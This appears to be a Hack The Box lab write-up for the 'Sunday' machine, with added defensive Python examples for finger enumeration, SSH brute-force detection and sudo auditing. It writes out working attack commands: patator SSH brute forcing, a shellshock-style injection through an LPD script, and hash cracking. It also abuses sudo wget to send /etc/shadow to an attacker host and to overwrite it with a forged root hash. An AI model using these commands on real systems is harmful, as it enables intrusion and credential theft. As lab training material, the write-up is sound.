HTB Write-up: Sunday (port 79 finger enumeration, SSH password cracking with patator)
What I learned today:
- Nmap: -p- --max-retries 1 (or 0) speeds up the all-port scan a bit.
- Port 79 is the finger service (https://en.wikipedia.org/wiki/Finger_%28protocol%29); it revealed some usernames with the finger-user-enum tool.
- ssh: add a key exchange algorithm with -oKexAlgorithms=+ALGORITHM_NAME
- Piping into |less -S turns off line wrapping (otherwise the output is too messy).
- For SSH password cracking, use patator.
syntax: patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
Wget
- wget -i to read files
- wget --post-file=FILE_PATH IP to upload a file to kali (nc listening on 80)
- openssl passwd -5 -salt thesalt pass123 to generate a SHA-256-crypt hash for a new shadow entry
A regular enumeration scan won't show the extra open ports, which include the SSH port.
Do a -p- scan even though it takes forever (speed it up with -p- --max-retries 1 or 0). Once we find weird ports, do a port-specific scan like
nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address
Port 79: finger service, https://en.wikipedia.org/wiki/Finger_%28protocol%29
Enumeration
For finger enum, I used finger-user-enum (pentestmonkey).
For usernames, used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 |less -S
Piping into |less -S turns off line wrapping (otherwise the output is too messy).
We got sammy and sunny.
We can try to SSH in. The password for the sammy account was sunny.
When you try to log in, it might give this error:
"No matching key exchange method found. Their offer: ~"
Add the offered key exchange algorithm with -oKexAlgorithms=+ALGORITHM_NAME
Now we are in.
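To make concrete what the finger service hands out, here is an added Python example (not part of the write-up, and not the finger-user-enum tool) that runs the RFC 1288 exchange against an in-process stub daemon. The stub's replies are constructed to look like Solaris-style finger output; the localhost port, the user names and the "Where" addresses are assumptions.

```python
import socket
import threading

# Constructed finger(1)-style replies for the stub daemon below. They follow the
# column layout Solaris and BSD fingerd print, but they are made up for this
# example, not captured from the box.
HEADER = "Login       Name               TTY         Idle    When    Where\n"
LOGGED_IN = {
    "sammy": "sammy       sammy              pts/2              Thu 17:49  10.10.14.3\n",
    "sunny": "sunny       sunny              pts/3              Thu 18:02  10.10.14.3\n",
}


def start_stub_fingerd():
    """Start a minimal fake fingerd on an ephemeral localhost port and return the port.

    Framing follows RFC 1288: the client sends one line ("<user>\\r\\n", or a bare
    "\\r\\n" for everyone logged in); the server writes its answer and closes.
    """
    ready = threading.Event()
    port_holder = []

    def serve():
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))
        srv.listen(8)
        port_holder.append(srv.getsockname()[1])
        ready.set()
        while True:
            conn, _ = srv.accept()
            with conn:
                query = conn.recv(1024).decode("ascii", "replace").strip()
                if query == "":                      # empty query: everyone logged in
                    rows = "".join(LOGGED_IN.values())
                else:                                # named query: that user, or nothing
                    rows = LOGGED_IN.get(query, "")
                conn.sendall((HEADER + rows).encode("ascii"))

    threading.Thread(target=serve, daemon=True).start()
    ready.wait(5)
    return port_holder[0]


def finger_query(host, port, username="", timeout=5.0):
    """Send one RFC 1288 query and return the daemon's full reply as text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{username}\r\n".encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:                             # server closed: reply complete
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", "replace")


def logins_in_reply(reply):
    """Login names a reply discloses: first field of every non-header, non-blank line."""
    return [line.split()[0] for line in reply.splitlines()
            if line.strip() and not line.startswith("Login ")]


if __name__ == "__main__":
    port = start_stub_fingerd()
    print("everyone logged in:", logins_in_reply(finger_query("127.0.0.1", port)))
    print("query 'sammy':     ", logins_in_reply(finger_query("127.0.0.1", port, "sammy")))
    print("query 'nobody':    ", logins_in_reply(finger_query("127.0.0.1", port, "nobody")))
```

The empty query is why the service is normally left disabled: it lists every logged-in account to an unauthenticated client, and a named query answers differently for real and unknown accounts, which is the kind of difference finger-user-enum looks for. There is no hardening short of turning the daemon off; on Solaris it is managed as an SMF service, on Linux it is usually an inetd/xinetd entry.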
SSH Password Cracking
For SSH password cracking, use patator.
syntax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
Use a password list that's not too big, or create your own.
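What a patator run like the one above looks like from the server's side, as an added detection example that is not part of the write-up: Python over constructed sshd log lines in OpenSSH's syslog format. The box runs Solaris, whose SSH daemon logs differently, so these lines are made up for the example; the IPs, user names, host name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (OpenSSH syslog layout, not captured from the box).
# The burst from 10.10.14.5 mimics an ssh_login run with persistent=0: one fresh
# connection per guess, so every guess leaves its own line.
SAMPLE_LOG = """\
Jan 10 12:00:01 sunday sshd[1201]: Failed password for sunny from 10.10.14.5 port 51112 ssh2
Jan 10 12:00:01 sunday sshd[1203]: Failed password for sunny from 10.10.14.5 port 51114 ssh2
Jan 10 12:00:02 sunday sshd[1205]: Failed password for sunny from 10.10.14.5 port 51116 ssh2
Jan 10 12:00:02 sunday sshd[1207]: Failed password for invalid user admin from 10.10.14.5 port 51118 ssh2
Jan 10 12:00:03 sunday sshd[1209]: Failed password for sunny from 10.10.14.5 port 51120 ssh2
Jan 10 12:00:03 sunday sshd[1211]: Failed password for sunny from 10.10.14.5 port 51122 ssh2
Jan 10 12:00:04 sunday sshd[1213]: Accepted password for sunny from 10.10.14.5 port 51124 ssh2
Jan 10 12:03:00 sunday sshd[1300]: Failed password for sammy from 10.10.14.9 port 40001 ssh2
Jan 10 12:03:07 sunday sshd[1302]: Accepted publickey for sammy from 10.10.14.9 port 40003 ssh2
"""

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def summarize_auth(lines):
    """Per source IP: failed-password count, distinct users tried, and whether a
    successful login followed the failures (a cracked password looks like this)."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "success_after_failures": False})
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        s = stats[m["src"]]
        if m["result"] == "Failed":
            s["failed"] += 1
            s["users"].add(m["user"])
        elif s["failed"] > 0:
            s["success_after_failures"] = True
    return stats


def flag_bruteforce(lines, threshold=5):
    """Return [(src, failed, users_tried, success_after_failures)] for every source
    with at least `threshold` failures, most failures first."""
    hits = []
    for src, s in summarize_auth(lines).items():
        if s["failed"] >= threshold:
            hits.append((src, s["failed"], sorted(s["users"]), s["success_after_failures"]))
    return sorted(hits, key=lambda h: -h[1])


if __name__ == "__main__":
    for src, failed, users, success in flag_bruteforce(SAMPLE_LOG.splitlines()):
        tail = "then LOGGED IN" if success else "no success seen"
        print(f"{src}: {failed} failed password attempts for {users}, {tail}")
```

The `-x ignore:mesg=...` option only filters patator's own output; it changes nothing on the wire, so per-source failure counts are the reliable signal. A source that trips the threshold and then gets an "Accepted" line is the case to treat as a compromise rather than just noise. The usual mitigations are key-only authentication for the exposed port, and lockout or rate limiting (fail2ban or the equivalent) keyed on exactly this count.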
Port 515 (printer)
Found info about LPD here and tried it, but didn't get the result: negative acknowledgement.
oh wait…
python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'
I used the above command and it executed it…
Does that mean we can get the shell back?
...didn't work.
Priv Esc
When looking into the files, we found a backup file and a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for sammy.
Switched user to sammy with the password.
Now it's showing the system name: SunOS 5.11. Maybe vulnerable to shellshock?
Random='() { :;}; echo nyannyannyan' bash -c :
If this works, the system is probably vulnerable to shellshock.
sudo -l to check whether any environment variables are kept.
No env variables are kept.
Run env and just pick one to use.
Looks like it's not vulnerable this time.
When checking sammy’s sudo -l, wget is available.
wget -h to see all the options we could use:
wget -i enabled us to see root files.
Create a file called "troll" with content like below:
#!/usr/bin/bash
bash
Upload it with the sammy account:
sudo wget http://10.10.14.131/troll -O /root/troll
and switch back to sunny (who has sudo access) to execute it.
In this particular box, there's a task that keeps overwriting the file.
To get around this, keep two SSH sessions open: one as sammy (wget to upload the file) and one as sunny (to execute the file).
As sammy, use
sleep 5; sudo wget 10.10.14.131/troll -O /root/troll
to wait 5 seconds before the upload, then quickly run the file from the sunny session.
for some reason, I couldn’t execute the /root/troll, I’m going to try another method.
Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc listening on 80).
Created a new file called shadow:
Create a new hash:
openssl passwd -5 -salt thesalt pass123
Paste the hash into the top (root) entry.
Upload the shadow file with the sammy account:
sudo wget 10.10.14.131/shadow -O /etc/shadow
We can confirm here that the shadow file got updated.
With the new pass, I got in!
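The root cause of this escalation is the sudo rule itself, so the defender's check is an audit of sudo -l (or sudoers) output. The following is an added Python example, not part of the write-up: it parses constructed sudo -l output (the layout follows sudo's usual format; the host name, the rule set and the "backup" user are assumptions) and flags root-level rules for wget, citing the three capabilities the write-up uses against it.

```python
import re

# Constructed `sudo -l` output in sudo's usual layout (not captured from the box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for sammy on sunday:
    env_reset, secure_path=/usr/sbin:/usr/bin

User sammy may run the following commands on sunday:
    (root) NOPASSWD: /usr/bin/wget
    (root) /usr/bin/id
    (backup) NOPASSWD: /usr/bin/wget
"""

# Why a root-level rule for each binary is dangerous, limited to what the
# write-up demonstrates: -i reads local files, -O writes any path, --post-file
# sends a file to a remote host.
FILE_ACCESS_RISK = {
    "wget": "-i reads any local file, -O writes any path, --post-file sends a file to a remote host",
}

# One rule line: "(runas[ : group]) [NOPASSWD:] cmd[, cmd...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [(runas_user, nopasswd, command)] from the 'may run' section of sudo -l."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()      # keep the user half of (user : group)
        for cmd in m["cmds"].split(","):
            rules.append((runas, bool(m["nopasswd"]), cmd.strip()))
    return rules


def audit_sudo_rules(text):
    """Flag rules that let the user drive a file-capable binary (or anything) as root.

    Returns [(command, nopasswd, reason)]; rules that run as another non-root user
    are skipped, everything else not in FILE_ACCESS_RISK is left for manual review.
    """
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            findings.append((cmd, nopasswd, "unrestricted root"))
            continue
        name = cmd.split()[0].rsplit("/", 1)[-1]     # basename of the binary
        if name in FILE_ACCESS_RISK:
            findings.append((cmd, nopasswd, FILE_ACCESS_RISK[name]))
    return findings


if __name__ == "__main__":
    for cmd, nopasswd, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{cmd} ({'NOPASSWD' if nopasswd else 'password'}): {reason}")
```

A rule like `(root) NOPASSWD: /usr/bin/wget` is equivalent to root for anyone who can read or write files, which is what the -O overwrite of /root/troll and the --post-file exfiltration of /etc/shadow above show. The fix is to remove the rule or pin it to the exact arguments the job needs; the periodic task that restores the file on this box is not a mitigation, it only makes the race slightly harder.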